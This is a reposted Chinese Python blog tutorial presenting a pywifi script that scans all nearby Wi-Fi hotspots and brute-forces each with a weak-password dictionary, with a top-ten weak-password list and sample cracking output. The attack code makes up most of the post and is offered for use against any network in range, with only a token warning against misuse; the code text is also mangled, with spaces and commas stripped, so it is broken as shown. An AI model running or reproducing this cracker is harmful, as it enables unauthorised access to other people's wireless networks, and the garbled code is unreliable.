一点号编程派6小时前
「短暂」的春节假期已经结束了,想必今天大家都已经开工了。新的一年,一起继续学习 Python,鸡年雄起~~
本文仅供大家参考,不要滥用哦。
原文:https://my.oschina.net/Apathy/blog/821039
环境准备python 2.7
凑合的 linux
差不多的无线网卡
pywifi模块
弱口令字典
清除系统中的任何 wifi 连接记录 \ (非常重要 \ ! \ ! \ ! \ )
首先,这个模块在 win 下有点鸡肋,作者在调用 WLANAPI 时没有做好 WLANSECURITYATTRIBUTES 的封装,所以推荐在 linux 下跑,我测试所使用的是 Kali 2.0 自带 python 2.7.6 ,可直接通过 pip install pywifi 安装。
导入模块这里用的模块就这三个。pywifi 的 wifiutillinux.py 脚本的 sendcmdtowpas 方法中的 if reply != b'OK\n':判断需要修改,不然会有很多的提示信息。
frompywifiimport*
importtime
importsys
字典准备效率很重要,毕竟这东西跑起来可真慢,下面是天朝用的比较多的 wifi 弱口令 TOP 10:
12345678
123456789
88888888
1234567890
00000000
87654321
66668888
11223344
147258369
11111111
配置扫描器推荐扫描时常可以设置在15-20秒之间。测试时常则可以自定义,考虑到认证速度于距离的关系,我一般设置在15左右,再久的也没意义。到时候就算破解成功的热点,信号也好不到哪里
defmain:
#扫描时常
scantimes=3
#单个密码测试延迟
testtimes=15
output=sys.stdout
#结果文件保存路径
files="TestRes.txt"
#字典列表
keys=open(sys.argv[1],"r").readlinesprint"|KEYS %s"%(len(keys))
#实例化一个pywifi对象
wifi=PyWiFi
#选择定一个网卡并赋值于iface
iface=wifi.interfaces[0]#通过iface进行一个时常为scantimes的扫描并获取附近的热点基础配置
scanres=scans(ifacescantimes)
#统计附近被发现的热点数量
nums=len(scanres)
print"|SCAN GET %s"%(nums)
print"%s\n%-*s| %-*s| %-*s| %-*s | %-*s | %-*s %*s \n%s"%("-"*706"WIFIID"18"SSID OR BSSID"2"N"4"time"7"signal"10"KEYNUM"10"KEY""="*70)
#将每一个热点信息逐一进行测试
forixinenumerate(scanres):
#测试完毕后,成功的结果讲存储到files中
res=test(nums-iifacexkeysoutputtesttimes)
ifres:
open(files"a").write(res)
扫描周围热点defscans(facetimeout):
#开始扫描
face.scan
time.sleep(timeout)
#在若干秒后获取扫描结果
returnface.scan_results
热点测试这里后续推荐将扫描过程数据入库,防止重复扫描,且更加直观。
deftest(ifacexkeystuts):
#显示对应网络名称,考虑到部分中文名啧显示bssid
showID=x.bssidiflen(x.ssid)>len(x.bssid)elsex.ssid
#迭代字典并进行爆破
fornkinenumerate(key):
x.key=k.strip
#移除所有热点配置
face.remove_all_network_profiles
#讲封装好的目标尝试连接
face.connect(face.add_network_profile(x))
#初始化状态码,考虑到用0会发生些逻辑错误
code=10
t1=time.time
#循环刷新状态,如果置为0则密码错误,如超时则进行下一个
whilecode!=0:
time.sleep(0.1)
code=face.status
now=time.time-t1
ifnowts:
break
stu.write("\r%-*s| %-*s| %s |%*.2fs| %-*s | %-*s %*s"%(6i18showIDcode5now7x.signal10len(key)-n10k.replace("\n""")))
stu.flush
ifcode==4:
face.disconnect
return"%-*s| %s | %*s |%*s\n"%(20x.ssidx.bssid3x.signal15k)
returnFalse
案例这里显示本次测试使用了11个弱口令,并扫描到了20个热点,然后开始坑爹的跑起来了
_ * WIFIID * _ 热点的 id 号 每跑一个会减1
_ * SSID OR BSSID * _ 热点的 ssid 名或 mac 地址
_ * N * _ 对热点的连接状态,这个在
* _time_ * 当前所花去的时间
* _signal_ * 热点的信号强度,若小越好
* _KEYNUM_ * 测试密码的 id 每跑一个会减1
* _KEY_ * 当前测试的密码
结果还不错,各位的安全意识不像以前那么蛋疼了,扫出一两个,其中一个还是自家的 - -
传送门后台回复关键词 wifi,即可获取相关字典、源码和模块的分享链接。
题图:pexels,CC0 授权。